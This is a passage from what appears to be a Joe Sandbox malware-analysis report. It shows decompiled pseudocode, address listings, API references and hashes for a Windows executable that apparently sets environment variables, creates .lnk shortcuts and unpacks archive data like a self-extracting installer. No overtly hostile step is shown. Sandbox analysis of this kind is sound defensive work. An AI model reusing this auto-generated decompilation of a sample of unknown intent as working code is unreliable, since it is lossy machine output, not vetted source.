										_t78 =  *_t31;
									}
								}
								_t32 = lstrlenA(_t78) + 1; // 0x1
								_t101 = _t32;
								_t94 = 2;
								_t33 = _t101 + 2; // 0x3
								_t55 = _t33 * _t94;
								_push( ~(0 | __eflags > 0x00000000) | _t55);
								L004191BC();
								__eflags =  *0x41e10c - 0xffffffff;
								 *(_t104 + 0x41e154) = _t55;
								if( *0x41e10c == 0xffffffff) {
									 *0x41e10c =  *0x41e10c & 0x00000000;
									_t60 = GetLocaleInfoW( *0x41e730 & 0x0000ffff, 0x1004,  &_v168, 0x1f);
									__eflags = _t60;
									if(_t60 > 0) {
										_t61 =  &_v168;
										__imp___wtol(_t61);
										 *0x41e10c = _t61;
									}
								}
								_t43 = _t101 + 1; // 0x2
								_t44 = _t104 + 0x41e154; // 0x0
								MultiByteToWideChar( *0x41e10c, 0, _t78, _t101,  *_t44, _t43);
								_t45 = _t104 + 0x41e154; // 0x0
								_t52 =  *_t45;
							}
							return _t52;
						}
						_t96 = 2;
						_t65 = (_v12 + 2) * _t96;
						_push( ~(0 | __eflags > 0x00000000) | _t65);
						L004191BC();
						_v8 = _t65;
						_t67 = GetEnvironmentVariableW( &_v104, _t65, _v12 + 1);
						__eflags = _t67 - _v12;
						if(_t67 > _v12) {
							L14:
							_push(_v8);
							L15:
							L004191B0();
							L16:
							goto L17;
						}
						_t68 = GetLastError();
						__eflags = _t68;
						if(_t68 != 0) {
							goto L14;
						}
						_t20 = _t104 + 0x41e154; // 0x0
						_t69 =  *_t20;
						__eflags = _t69;
						if(_t69 == 0) {
							 *(_t104 + 0x41e154) = _v8;
							goto L17;
						}
						_t102 = _v8;
						_t71 = lstrcmpiW(_t69, _t102);
						__eflags = _t71;
						if(_t71 == 0) {
							_push(_t102);
							goto L15;
						}
						_t22 = _t104 + 0x41e154; // 0x0
						_push( *_t22);
						L004191B0();
						 *(_t104 + 0x41e154) = _t102;
						goto L16;
					}
					return 0x41aa3c;
				} else {
					_t73 = 0x41e148;
					while( *_t73 != _t79) {
						_t103 = _t103 + 1;
						_t2 = (_t103 << 4) + 0x41e148; // 0x30000000
						_t73 = _t2;
						if( *_t73 != 0) {
							continue;
						}
						goto L4;
					}
					goto L4;
				}
			}

0x00403dc8
0x00403dd5
0x00403dd7
0x00403dda
0x00403de0
0x00403dfb
0x00403dfb
0x00403e04
0x00403e1c
0x00403e28
0x00403e3f
0x00403e44
0x00403e46
0x00403ec0
0x00403ec3
0x00403ec9
0x00403ec9
0x00403ecf
0x00403ed1
0x00403ed7
0x00403ed7
0x00403edd
0x00403ee3
0x00403eea
0x00403ef0
0x00403ef2
0x00403ef2
0x00403ef2
0x00403ef0
0x00403eff
0x00403eff
0x00403f06
0x00403f07
0x00403f0a
0x00403f13
0x00403f14
0x00403f19
0x00403f21
0x00403f27
0x00403f29
0x00403f46
0x00403f4c
0x00403f4e
0x00403f50
0x00403f57
0x00403f5e
0x00403f5e
0x00403f4e
0x00403f63
0x00403f67
0x00403f77
0x00403f7d
0x00403f7d
0x00403f7d
0x00000000
0x00403f83
0x00403e52
0x00403e53
0x00403e5c
0x00403e5d
0x00403e69
0x00403e70
0x00403e72
0x00403e75
0x00403eb7
0x00403eb7
0x00403eba
0x00403eba
0x00403ebf
0x00000000
0x00403ebf
0x00403e77
0x00403e79
0x00403e7b
0x00000000
0x00000000
0x00403e7d
0x00403e7d
0x00403e83
0x00403e85
0x00403eaf
0x00000000
0x00403eaf
0x00403e87
0x00403e8c
0x00403e92
0x00403e94
0x00403ea9
0x00000000
0x00403ea9
0x00403e96
0x00403e96
0x00403e9c
0x00403ea1
0x00000000
0x00403ea1
0x00000000
0x00403de2
0x00403de2
0x00403de7
0x00403deb
0x00403df1
0x00403df1
0x00403df9
0x00000000
0x00000000
0x00000000
0x00403df9
0x00000000
0x00403de7

APIs

GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
wsprintfW.USER32 ref: 00403E28
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
GetLastError.KERNEL32 ref: 00403E42
??2@YAPAXI@Z.MSVCRT ref: 00403E5D
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
GetLastError.KERNEL32 ref: 00403E77
lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
??3@YAXPAX@Z.MSVCRT ref: 00403E9C
??3@YAXPAX@Z.MSVCRT ref: 00403EBA
SetLastError.KERNEL32(?), ref: 00403EC3
lstrlenA.KERNEL32(0041B930), ref: 00403EF9
??2@YAPAXI@Z.MSVCRT ref: 00403F14
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46
_wtol.MSVCRT(?), ref: 00403F57
MultiByteToWideChar.KERNEL32(00000000,0041B930,00000001,00000000,00000002), ref: 00403F77

Strings

HA, xrefs: 00403DE2
SfxString%d, xrefs: 00403E22

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: HA$SfxString%d
API String ID: 2117570002-4175495882
Opcode ID: c40ca9b59b3210fdc7418c4d0434d741c146eedfdbe0dc8c2d5985f804d4a5b9
Instruction ID: 826b4a115549d6cfa4e8bf1551a429c7e3dac2c77e478b686eb9c33c06818d2c
Opcode Fuzzy Hash: c40ca9b59b3210fdc7418c4d0434d741c146eedfdbe0dc8c2d5985f804d4a5b9
Instruction Fuzzy Hash: E0518F75A00205BFDB209F65DD499ABBBBCEF44301B10853BE906E6290E738AE54CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004048CC, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 263
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004048CC(signed short* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v20;
				char _v24;
				char _v36;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v104;
				char _v108;
				char _v120;
				char _v644;
				signed int _t99;
				signed short* _t101;
				signed short* _t106;
				char* _t108;
				void* _t119;
				void* _t125;
				void* _t129;
				char* _t133;
				intOrPtr* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				intOrPtr* _t146;
				intOrPtr* _t148;
				intOrPtr* _t150;
				signed int _t158;
				signed short* _t159;
				signed short* _t164;
				intOrPtr* _t174;
				signed short _t176;
				signed int _t179;
				signed short* _t237;
				void* _t238;

				_t174 = __imp___wtol;
				_t237 = __ecx;
				_t99 =  *__ecx & 0x0000ffff;
				if(_t99 < 0x30 || _t99 > 0x39) {
					_t176 = 0x20;
					_t101 = (_t99 | _t176) - 0x64;
					__eflags = _t101;
					if(_t101 == 0) {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t16 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t16 & 0xfffffff7) + 0x19;
						__eflags = _t106;
						goto L11;
					}
					_t159 = _t101 - 0xc;
					__eflags = _t159;
					if(_t159 == 0) {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t12 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t12 & 0xffffffeb) + 0x17;
						goto L11;
					}
					_t164 = _t159 - 3;
					__eflags = _t164;
					if(_t164 == 0) {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t8 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t8 & 0xfffffff5) + 0x16;
						goto L11;
					}
					__eflags = _t164 != 1;
					if(_t164 != 1) {
						goto L37;
					} else {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t4 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t4 & 0xffffffef) + 0x18;
						goto L11;
					}
				} else {
					_t106 =  *_t174(__ecx);
					L11:
					while(1) {
						_t179 =  *_t237 & 0x0000ffff;
						if(_t179 == 0x2c) {
							break;
						}
						__eflags = _t179;
						if(_t179 == 0) {
							L36:
							L37:
							return 0;
						}
						_t237 =  &(_t237[1]);
						__eflags = _t237;
					}
					_t108 =  &_v644;
					__imp__SHGetSpecialFolderPathW(0, _t108, _t106, 0);
					if(_t108 != 0) {
						E00411B60(E00411B60(E00411B60(E00411B60(E00411B60(E00411B60(E00411B60(E00411B60(E00411B84( &_v36,  &_v644),  &_v48),  &_v84),  &_v72),  &_v96),  &_v24),  &_v108),  &_v60),  &_v120);
						_t119 = E0040358B(_t237,  &_v48);
						if(_v44 != 0) {
							_t125 = E0040358B(E0040358B(E0040358B(E0040358B(E0040358B(E0040358B(_t119,  &_v84),  &_v72),  &_v96),  &_v24),  &_v108),  &_v60);
							_t232 =  &_v120;
							E0040358B(_t125,  &_v120);
							_t238 =  *_t174(_v120);
							_t246 = _v20;
							if(_v20 == 0) {
								E00411BE5( &_v24, _v48 + 2 + E004038FB( &_v48, _t246) * 2);
								_t158 = E00411DFA( &_v24, 0x2e);
								if(_t158 >= 0) {
									_t232 = _v24;
									_v20 = _t158;
									 *((short*)(_v24 + _t158 * 2)) = 0;
								}
							}
							E004015EC( &_v36, 0x5c);
							_t249 = _v68;
							if(_v68 != 0) {
								E00411CE3( &_v36, _t249,  &_v72);
								E004015EC( &_v36, 0x5c);
							}
							_t129 = E00404772(_v36, _t232);
							_t250 = _t129;
							if(_t129 != 0) {
								E00411CE3( &_v36, _t250,  &_v24);
								E00411CA3( &_v36, L".lnk");
								_t133 =  &_v8;
								_v8 = 0;
								__imp__CoCreateInstance(0x41c85c, 0, 1, 0x41c80c, _t133);
								if(_t133 >= 0) {
									_t134 = _v8;
									_v12 = 0;
									 *((intOrPtr*)( *_t134 + 0x50))(_t134, _v48);
									if(_v92 != 0) {
										_t150 = _v8;
										 *((intOrPtr*)( *_t150 + 0x1c))(_t150, _v96);
									}
									if(_v80 != 0) {
										_t148 = _v8;
										 *((intOrPtr*)( *_t148 + 0x2c))(_t148, _v84);
									}
									if(_v104 != 0) {
										_t146 = _v8;
										 *((intOrPtr*)( *_t146 + 0x24))(_t146, _v108);
									}
									if(_v56 != 0) {
										_t144 = _v8;
										 *((intOrPtr*)( *_t144 + 0x44))(_t144, _v60, _t238);
									}
									_t136 = _v8;
									_push( &_v12);
									_push(0x41c83c);
									_push(_t136);
									if( *((intOrPtr*)( *_t136))() >= 0) {
										_t140 = _v12;
										 *((intOrPtr*)( *_t140 + 0x18))(_t140, _v36, 1);
										_t142 = _v12;
										 *((intOrPtr*)( *_t142 + 8))(_t142);
									}
									_t138 = _v8;
									 *((intOrPtr*)( *_t138 + 8))(_t138);
								}
							}
						}
						_push(_v120);
						L004191B0();
						_push(_v60);
						L004191B0();
						_push(_v108);
						L004191B0();
						_push(_v24);
						L004191B0();
						_push(_v96);
						L004191B0();
						_push(_v72);
						L004191B0();
						_push(_v84);
						L004191B0();
						_push(_v48);
						L004191B0();
						_push(_v36);
						L004191B0();
					}
					goto L36;
				}
			}

0x004048d6
0x004048dd
0x004048df
0x004048e5
0x004048f7
0x004048fa
0x004048fa
0x004048fd
0x0040496a
0x00404971
0x00404977
0x00404977
0x00000000
0x00404977
0x004048ff
0x004048ff
0x00404902
0x0040494f
0x00404956
0x0040495c
0x00000000
0x0040495c
0x00404904
0x00404904
0x00404907
0x00404934
0x0040493b
0x00404941
0x00000000
0x00404941
0x00404909
0x0040490a
0x00000000
0x00404910
0x00404919
0x00404920
0x00404926
0x00000000
0x00404926
0x004048ec
0x004048ed
0x0040497a
0x0040498b
0x0040498b
0x00404991
0x00000000
0x00000000
0x0040497f
0x00404982
0x00404bd6
0x00404bd8
0x00404bdc
0x00404bdc
0x00404988
0x00404988
0x00404988
0x00404995
0x0040499d
0x004049a5
0x004049f5
0x004049ff
0x00404a07
0x00404a44
0x00404a49
0x00404a4e
0x00404a59
0x00404a5b
0x00404a5e
0x00404a73
0x00404a7d
0x00404a84
0x00404a86
0x00404a8b
0x00404a8e
0x00404a8e
0x00404a84
0x00404a97
0x00404a9c
0x00404a9f
0x00404aa8
0x00404ab2
0x00404ab2
0x00404aba
0x00404abf
0x00404ac1
0x00404ace
0x00404adb
0x00404ae0
0x00404af1
0x00404af4
0x00404afc
0x00404b02
0x00404b08
0x00404b0e
0x00404b14
0x00404b16
0x00404b1f
0x00404b1f
0x00404b25
0x00404b27
0x00404b30
0x00404b30
0x00404b36
0x00404b38
0x00404b41
0x00404b41
0x00404b47
0x00404b49
0x00404b53
0x00404b53
0x00404b56
0x00404b5e
0x00404b5f
0x00404b64
0x00404b69
0x00404b6b
0x00404b76
0x00404b79
0x00404b7f
0x00404b7f
0x00404b82
0x00404b88
0x00404b88
0x00404afc
0x00404ac1
0x00404b8b
0x00404b8e
0x00404b93
0x00404b96
0x00404b9b
0x00404b9e
0x00404ba3
0x00404ba6
0x00404bab
0x00404bae
0x00404bb3
0x00404bb6
0x00404bbb
0x00404bbe
0x00404bc3
0x00404bc6
0x00404bcb
0x00404bce
0x00404bd3
0x00000000
0x004049a5

APIs

_wtol.MSVCRT ref: 004048ED
SHGetSpecialFolderPathW.SHELL32(00000000,?,-0000001A,00000000), ref: 0040499D
_wtol.MSVCRT(?,?), ref: 00404A56
CoCreateInstance.OLE32(0041C85C,00000000,00000001,0041C80C,?,.lnk,?,0000005C), ref: 00404AF4
??3@YAXPAX@Z.MSVCRT ref: 00404B8E
??3@YAXPAX@Z.MSVCRT ref: 00404B96
??3@YAXPAX@Z.MSVCRT ref: 00404B9E
??3@YAXPAX@Z.MSVCRT ref: 00404BA6
??3@YAXPAX@Z.MSVCRT ref: 00404BAE
??3@YAXPAX@Z.MSVCRT ref: 00404BB6
??3@YAXPAX@Z.MSVCRT ref: 00404BBE
??3@YAXPAX@Z.MSVCRT ref: 00404BC6
??3@YAXPAX@Z.MSVCRT ref: 00404BCE

Strings

.lnk, xrefs: 00404AD3

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: 8f4be62236c205874ad8fe4d42cfdaf836737bed6dde23ea050fd9b739d62d60
Instruction ID: 83a2d305c882314969b83a1368edb940d706b9a9cbb686142cff4198cf257129
Opcode Fuzzy Hash: 8f4be62236c205874ad8fe4d42cfdaf836737bed6dde23ea050fd9b739d62d60
Instruction Fuzzy Hash: 8891B375900109ABCF04EFA5CC959EEB779BF84304B60457EF502B71A1EB39AE85CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004142CC, Relevance: 24.7, APIs: 16, Instructions: 696
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E004142CC(signed int __ecx, void* __edx, void* __esi, void* __eflags) {
				void* __edi;
				signed int _t328;
				signed int _t340;
				signed int _t343;
				intOrPtr _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t365;
				signed int _t367;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed int _t384;
				signed int _t386;
				signed int _t388;
				signed int _t392;
				signed int _t396;
				signed int _t400;
				signed int* _t403;
				signed int _t406;
				signed int _t409;
				signed int _t411;
				signed int _t415;
				signed int _t419;
				signed int _t420;
				intOrPtr* _t421;
				signed int _t426;
				signed int _t430;
				short* _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				unsigned int _t442;
				signed int _t447;
				signed int _t456;
				signed int _t459;
				signed int _t460;
				signed int _t462;
				intOrPtr _t465;
				signed int _t466;
				signed int _t467;
				intOrPtr _t468;
				void* _t469;
				intOrPtr _t477;
				signed int _t478;
				intOrPtr* _t481;
				signed int _t503;
				signed int _t526;
				signed int _t529;
				signed int _t544;
				signed int _t554;
				intOrPtr _t560;
				void* _t571;
				intOrPtr _t573;
				signed int _t574;
				signed int _t576;
				signed int _t589;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				intOrPtr* _t594;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t601;
				signed int _t602;
				void* _t605;
				signed int _t606;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				short* _t612;
				intOrPtr _t614;
				intOrPtr _t615;
				void* _t616;
				signed int* _t617;
				void* _t619;

				_t571 = __edx;
				_t617 = _t619 - 0x44;
				_t459 = _t617[0x16];
				_t589 = _t617[0x17];
				_t617[0xf] = __ecx;
				_t328 = _t589 << 2;
				_t617[0xc] = _t328;
				_t617[8] =  *((intOrPtr*)(_t459 + 8)) +  *( *((intOrPtr*)(_t459 + 0x30)) + _t328) * 8;
				 *((intOrPtr*)(_t617 - 0x18)) = 0;
				 *(_t617 - 0x14) = 0;
				 *((intOrPtr*)(_t617 - 0x10)) = 0;
				 *((intOrPtr*)(_t617 - 0xc)) = 0;
				 *((intOrPtr*)(_t617 - 8)) = 0;
				 *((intOrPtr*)(_t617 - 4)) = 0;
				E00416CB7(_t459, __eflags, _t589, _t617 - 0x18);
				 *_t617 =  *( *((intOrPtr*)(_t459 + 0x34)) + _t589) & 0x000000ff;
				if( *(_t617 - 0x14) <= 0x20) {
					_push(__esi);
					E00413A8C(_t617 - 0x7c);
					 *((intOrPtr*)(_t617 - 0x3c)) = 0;
					 *((intOrPtr*)(_t617 - 0x38)) = 0;
					 *((intOrPtr*)(_t617 - 0x34)) = 0;
					E00414008(_t617 - 0x7c, _t617 - 0x7c, _t571, _t617 - 0x18, __eflags);
					_t340 = E004183C8(_t617 - 0x7c, _t571, _t589);
					__eflags = _t340;
					if(_t340 != 0) {
						_t343 = ( *( *((intOrPtr*)(_t459 + 0x34)) + _t589) & 0x000000ff) +  *(_t617[0xc] +  *((intOrPtr*)(_t459 + 0x2c)));
						_t477 =  *((intOrPtr*)(_t459 + 0x28));
						_t573 =  *((intOrPtr*)(_t477 + _t343 * 8));
						_t344 =  *((intOrPtr*)(_t477 + 4 + _t343 * 8));
						_t478 = _t617[0x18];
						_t617[0x17] = 1;
						__eflags = _t478;
						if(_t478 == 0) {
							L15:
							_t601 = _t617[0xf];
							__eflags =  *_t601;
							if( *_t601 == 0) {
								L17:
								_t345 =  *(_t601 + 0x5c);
								__eflags = _t345;
								if(_t345 != 0) {
									_t345 =  *((intOrPtr*)( *_t345 + 8))(_t345);
									_t54 = _t601 + 0x5c;
									 *_t54 =  *(_t601 + 0x5c) & 0x00000000;
									__eflags =  *_t54;
								}
								_push(0x84);
								L004191BC();
								__eflags = _t345;
								if(__eflags == 0) {
									_t346 = 0;
									__eflags = 0;
								} else {
									_t346 = E00414215(_t345, __eflags, 0);
								}
								 *(_t601 + 0x54) = _t346;
								E004010F2(_t601 + 0x5c, _t346);
								_t348 =  *(_t601 + 0x54);
								__eflags = _t348;
								if(_t348 == 0) {
									_t481 = 0;
									__eflags = 0;
								} else {
									_t481 = _t348 + 4;
								}
								_t574 = _t617 - 0x7c;
								 *((intOrPtr*)(_t601 + 0x58)) = _t481;
								_t350 =  *((intOrPtr*)( *_t481))(_t574);
								_t590 = 0;
								__eflags = _t350;
								if(_t350 == 0) {
									_t617[0x10] = 0;
									__eflags =  *(_t617 - 0x14);
									if(__eflags <= 0) {
										L36:
										E00413AEC(_t601 + 4, __eflags, _t617 - 0x7c);
										E004139AE(_t601 + 0x44, _t617 - 0x3c);
										 *_t601 = 1;
										L37:
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t601 + 0x58)))) + 0x10))();
										_t358 =  *(_t617[0xc] +  *((intOrPtr*)(_t459 + 0x2c)));
										_t591 = 0;
										_t617[0xa] = 0;
										 *(_t617 - 0x2c) = _t358;
										_t617[0xd] = 0;
										__eflags =  *(_t617 - 0x14);
										if( *(_t617 - 0x14) <= 0) {
											L76:
											__eflags = _t617[0x19] - _t591;
											if(_t617[0x19] != _t591) {
												__eflags = _t617[0x17];
												_t223 = _t617[0x17] == 0;
												__eflags = _t223;
												_t358 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t601 + 0x58)))) + 0xc))((_t574 & 0xffffff00 | _t223) & 0x000000ff);
											}
											_push(0x30);
											_t617[2] = _t591;
											_t617[3] = _t591;
											_t617[4] = _t591;
											L004191BC();
											__eflags = _t358 - _t591;
											if(_t358 == _t591) {
												_t359 = 0;
												__eflags = 0;
											} else {
												_t359 = E00413E1F(_t358);
											}
											_t617[0x16] = _t359;
											__eflags = _t359 - _t591;
											if(_t359 != _t591) {
												 *((intOrPtr*)( *_t359 + 4))(_t359);
											}
											__eflags =  *((intOrPtr*)(_t617 - 4)) - 1;
											_t460 = _t617[0x13];
											if( *((intOrPtr*)(_t617 - 4)) <= 1) {
												L99:
												_t617[0x1d] = _t591;
												__eflags =  *((intOrPtr*)(_t617 - 4)) - _t591;
												if( *((intOrPtr*)(_t617 - 4)) <= _t591) {
													L113:
													E00413A3E( &(_t617[0x13]), _t617[3]);
													__eflags = _t617[3];
													_t592 = _t617[0x13];
													if(_t617[3] <= 0) {
														L116:
														__eflags = _t617[0x19];
														if(_t617[0x19] == 0) {
															_push(_t592);
															L004191B0();
															_t361 = _t617[0x16];
															__eflags = _t361;
															if(_t361 != 0) {
																_t361 =  *((intOrPtr*)( *_t361 + 8))(_t361);
															}
															E004014A8(_t361,  &(_t617[2]));
															L10:
															_t602 = 0x80004005;
															goto L5;
														}
														_t462 = 0;
														_t617[0x13] = 0;
														__eflags = _t617[0x1a];
														if(_t617[0x1a] != 0) {
															_push( *((intOrPtr*)( *((intOrPtr*)(_t601 + 0x58)) + 0x60)));
															_t374 = E004184BF( *((intOrPtr*)(_t601 + 0x58)));
															__eflags = _t374;
															if(_t374 == 0) {
																_push(0xc);
																L004191BC();
																__eflags = _t374;
																if(_t374 == 0) {
																	_t375 = 0;
																	__eflags = 0;
																} else {
																	_t375 = E00413BE7(_t374, _t617[0x1a]);
																}
																E004010F2( &(_t617[0x13]), _t375);
																_t462 = _t617[0x13];
															}
														}
														_t617[0x18] = _t617[0x19];
														_t367 = _t462;
														__eflags = _t462;
														if(_t462 == 0) {
															_t367 = _t617[0x1a];
														}
														_t602 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t601 + 0x58)))) + 0x18))(_t592,  &(_t617[0x18]), _t367);
														__eflags = _t462;
														if(_t462 != 0) {
															 *((intOrPtr*)( *_t462 + 8))(_t462);
														}
														_push(_t592);
														L004191B0();
														L121:
														_t370 = _t617[0x16];
														__eflags = _t370;
														if(_t370 != 0) {
															_t370 =  *((intOrPtr*)( *_t370 + 8))(_t370);
														}
														E004014A8(_t370,  &(_t617[2]));
														goto L5;
													}
													_t576 = _t617[3];
													_t377 = _t592;
													_t503 = _t617[2] - _t592;
													__eflags = _t503;
													do {
														 *_t377 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + _t377))));
														_t377 = _t377 + 4;
														_t576 = _t576 - 1;
														__eflags = _t576;
													} while (_t576 != 0);
													goto L116;
												} else {
													goto L100;
												}
												do {
													L100:
													_t378 = _t617[8];
													_t617[0x18] = _t617[0x18] & 0x00000000;
													_t594 = _t378 + _t617[0x1d] * 8;
													_t605 =  *_t594 + _t617[0x14];
													_t465 =  *((intOrPtr*)(_t594 + 4));
													asm("adc ebx, [ebp+0x54]");
													__eflags =  *((intOrPtr*)(_t617 - 4)) - 1;
													if( *((intOrPtr*)(_t617 - 4)) != 1) {
														_push(0x20);
														L004191BC();
														__eflags = _t378;
														if(_t378 == 0) {
															_t268 =  &(_t617[0x17]);
															 *_t268 = _t617[0x17] & 0x00000000;
															__eflags =  *_t268;
														} else {
															 *(_t378 + 4) =  *(_t378 + 4) & 0x00000000;
															 *_t378 = 0x41c6e8;
															 *(_t378 + 0x18) =  *(_t378 + 0x18) & 0x00000000;
															_t617[0x17] = _t378;
														}
														E0040CBC0( &(_t617[0x18]), _t617[0x17]);
														_push(_t465);
														_t380 = E00413D5A(_t617[0x17], _t617[0x16], _t605);
														goto L107;
													}
													_t388 = _t617[0x13];
													_t602 =  *((intOrPtr*)( *_t388 + 0x10))(_t388, _t605, _t465, 0, 0);
													__eflags = _t602;
													if(_t602 != 0) {
														goto L121;
													}
													_t380 = E0040CBC0( &(_t617[0x18]), _t617[0x13]);
													L107:
													_push(0x28);
													L004191BC();
													_t606 = 0;
													__eflags = _t380;
													if(_t380 != 0) {
														 *((intOrPtr*)(_t380 + 4)) = 0;
														 *_t380 = 0x41c6f8;
														 *((intOrPtr*)(_t380 + 8)) = 0;
														_t606 = _t380;
													}
													E0040CBC0(E00418703(_t380,  &(_t617[2])), _t606);
													_t278 = _t606 + 8; // 0x8
													E0040CBC0(_t278, _t617[0x18]);
													_t384 = _t617[8];
													_t466 = _t617[0x1d];
													asm("sbb eax, [edi+0x4]");
													 *(_t606 + 0x18) =  *(_t606 + 0x18) & 0x00000000;
													 *(_t606 + 0x1c) =  *(_t606 + 0x1c) & 0x00000000;
													 *((intOrPtr*)(_t606 + 0x14)) =  *((intOrPtr*)(_t384 + 0xc + _t466 * 8));
													_t386 = _t617[0x18];
													 *((intOrPtr*)(_t606 + 0x10)) =  *((intOrPtr*)(_t384 + 8 + _t466 * 8)) -  *_t594;
													 *((char*)(_t606 + 0x20)) = 0;
													__eflags = _t386;
													if(_t386 != 0) {
														 *((intOrPtr*)( *_t386 + 8))(_t386);
													}
													_t467 = _t466 + 1;
													_t617[0x1d] = _t467;
													__eflags = _t467 -  *((intOrPtr*)(_t617 - 4));
												} while (_t467 <  *((intOrPtr*)(_t617 - 4)));
												_t601 = _t617[0xf];
												goto L113;
											} else {
												_t392 = _t617[8];
												asm("adc eax, [ebp+0x54]");
												_t595 =  *((intOrPtr*)( *_t460 + 0x10))(_t460,  *_t392 + _t617[0x14],  *((intOrPtr*)(_t392 + 4)), 0, _t617[0x16] + 0x10);
												__eflags = _t595;
												if(_t595 == 0) {
													E004010F2(_t617[0x16] + 8, _t460);
													_t591 = 0;
													__eflags = 0;
													goto L99;
												}
												_t396 = _t617[0x16];
												__eflags = _t396;
												if(_t396 != 0) {
													_t396 =  *((intOrPtr*)( *_t396 + 8))(_t396);
												}
												E004014A8(_t396,  &(_t617[2]));
												L88:
												_t602 = _t595;
												goto L5;
											}
										}
										_t400 = _t358 << 3;
										__eflags = _t400;
										_t617[6] = 0;
										_t617[5] = _t400;
										do {
											_t608 =  *((intOrPtr*)(_t617 - 0x18)) + _t617[6];
											_t617[1] = _t608;
											_t403 =  *((intOrPtr*)( *( *(_t617[0xf] + 0x58)) + 8))(_t617[0xd]);
											_t526 =  *_t403;
											__eflags = _t526;
											if(_t526 == 0) {
												_t596 = _t403[1];
												_t617[7] = _t596;
											} else {
												_t596 = _t526;
												_t617[7] = _t526;
											}
											_t617[9] = _t617[9] & 0x00000000;
											 *((intOrPtr*)( *_t596))(_t596, 0x41a450,  &(_t617[9]));
											_t406 = _t617[9];
											__eflags = _t406;
											if(_t406 == 0) {
												L50:
												_t617[0xb] = _t617[0xb] & 0x00000000;
												 *((intOrPtr*)( *_t596))(_t596, 0x41a4f0,  &(_t617[0xb]));
												_t529 = _t617[0xb];
												__eflags = _t529;
												if(_t529 == 0) {
													L60:
													_t409 = _t617[7];
													_t617[0x10] = _t617[0x10] & 0x00000000;
													 *((intOrPtr*)( *_t409))(_t409, 0x41a470,  &(_t617[0x10]));
													_t411 = _t617[0x10];
													__eflags = _t411;
													if(_t411 == 0) {
														L64:
														_t609 =  *(_t617[1] + 0x10);
														_t617[1] = _t609;
														E00413A13( &(_t617[0xc]), _t609);
														E00413A3E(_t617 - 0x30, _t609);
														_t468 =  *((intOrPtr*)(_t617 - 0x30));
														_t597 = 0;
														__eflags = _t609;
														if(_t609 == 0) {
															L71:
															_t415 = _t617[0x18];
															__eflags = _t415;
															if(_t415 == 0) {
																L73:
																_t415 =  *((intOrPtr*)(_t617[0x16] + 0x28)) + _t617[5];
																__eflags = _t415;
																goto L74;
															}
															__eflags = _t617[0xd] -  *((intOrPtr*)(_t617 - 0x58));
															if(_t617[0xd] ==  *((intOrPtr*)(_t617 - 0x58))) {
																goto L74;
															}
															goto L73;
														}
														_t610 = _t617[0xc];
														do {
															_t419 = E00413BA9(_t617 - 0x18, _t617[0xa]);
															__eflags = _t419;
															if(_t419 < 0) {
																_t420 = E00413B85(_t617 - 0x18, _t617[0xa]);
																__eflags = _t420;
																if(_t420 < 0) {
																	_push(_t468);
																	L004191B0();
																	_push(_t617[0xc]);
																	L004191B0();
																	goto L4;
																}
																_t421 = _t617[8] + _t420 * 8;
